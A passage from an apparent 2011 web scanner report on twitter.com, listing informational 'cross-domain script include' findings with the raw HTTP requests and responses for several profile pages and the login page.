http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /jasmith579 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:29:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664154-93629-22875
ETag: "4ae2360483e9ccb335b871d108b15610"
Last-Modified: Wed, 02 Feb 2011 16:29:14 GMT
X-Runtime: 0.01143
Content-Type: text/html; charset=utf-8
Content-Length: 56372
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.304. http://twitter.com/jasmith579 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jasmith579

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /jasmith579 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570798-55196-13932
ETag: "a2ecebaaf9d3d360bc805f817b215a77"
Last-Modified: Tue, 01 Feb 2011 14:33:18 GMT
X-Runtime: 0.01289
Content-Type: text/html; charset=utf-8
Content-Length: 56069
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570798090853; path=/; expires=Tue, 08-Feb-11 14:33:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079811198493; path=/; expires=Thu, 03 Mar 2011 14:33:18 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTk3N2U3YTMxNDg1NWUwNjcwZTdlOTdmNDJhZjZjM2UyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIIVCk4S0B--796785cfb0d38949a5ae8675f3a91166e867ce5c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369" type="text/javascript"></script>
...[SNIP]...

18.305. http://twitter.com/jobs4writers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jobs4writers

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /jobs4writers HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:27:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664075-62155-45945
ETag: "bd98cc0b6eac3390c57c60a587e71590"
Last-Modified: Wed, 02 Feb 2011 16:27:55 GMT
X-Runtime: 0.01683
Content-Type: text/html; charset=utf-8
Content-Length: 47970
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.306. http://twitter.com/jobs4writers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jobs4writers

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560
http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560
http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /jobs4writers HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570770-98065-13077
ETag: "1b0bc4eda75c7bfc5a3aefe4e3c48102"
Last-Modified: Tue, 01 Feb 2011 14:32:50 GMT
X-Runtime: 0.01223
Content-Type: text/html; charset=utf-8
Content-Length: 48119
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570768635237; path=/; expires=Tue, 08-Feb-11 14:32:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657077084360183; path=/; expires=Thu, 03 Mar 2011 14:32:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTcyMDA4MmFhOWEwMTE0OWMzZjkwOWM2MTQwZmU4Yjc1Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIneWj4S0B--f76cb5e0d79a1f81cfaea789953eb10c055b5927; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560" type="text/javascript"></script>
...[SNIP]...

18.307. http://twitter.com/ligatt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ligatt

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ligatt HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296661355-75046-21619
ETag: "31dfafc6b29dbec79c913fe638627e5f"
Last-Modified: Wed, 02 Feb 2011 15:42:35 GMT
X-Runtime: 0.01660
Content-Type: text/html; charset=utf-8
Content-Length: 47876
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296661353295022; path=/; expires=Wed, 09-Feb-11 15:42:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=129666135533188415; path=/; expires=Fri, 04 Mar 2011 15:42:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEUbCuctAToHaWQiJWE2OWEyMWIxMTc5YTYw%250ANmZhN2Q3OTIyYzc5ZDYwNWQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a4e58d6dbb8d0ce1ed03c56c36f6c02738fdac86; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.308. http://twitter.com/lijobs_sales previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/lijobs_sales

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /lijobs_sales HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570792-82751-28503
ETag: "932f52e7f7af6068f672d95cf3725d61"
Last-Modified: Tue, 01 Feb 2011 14:33:12 GMT
X-Runtime: 0.02091
Content-Type: text/html; charset=utf-8
Content-Length: 40921
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570792688045; path=/; expires=Tue, 08-Feb-11 14:33:12 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079281895011; path=/; expires=Thu, 03 Mar 2011 14:33:12 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWYzYTM1Mjk5ZGJhN2YzYzA1NDYxNzI4M2Q1NDUwYTVjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIdDuk4S0B--20a6c586394dd649985d85da8e4da5d7defdfc8e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369" type="text/javascript"></script>
...[SNIP]...

18.309. http://twitter.com/lijobs_sales previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/lijobs_sales

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /lijobs_sales HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664103-15847-18632
ETag: "53c8358af491fdc45c182be1d442205a"
Last-Modified: Wed, 02 Feb 2011 16:28:23 GMT
X-Runtime: 0.00990
Content-Type: text/html; charset=utf-8
Content-Length: 40852
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.310. http://twitter.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664208-72921-43740
ETag: "9e328ea897d9f265c5b8ef97f400cc24"
Last-Modified: Wed, 02 Feb 2011 16:30:08 GMT
X-Runtime: 0.04025
Content-Type: text/html; charset=utf-8
Content-Length: 12714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
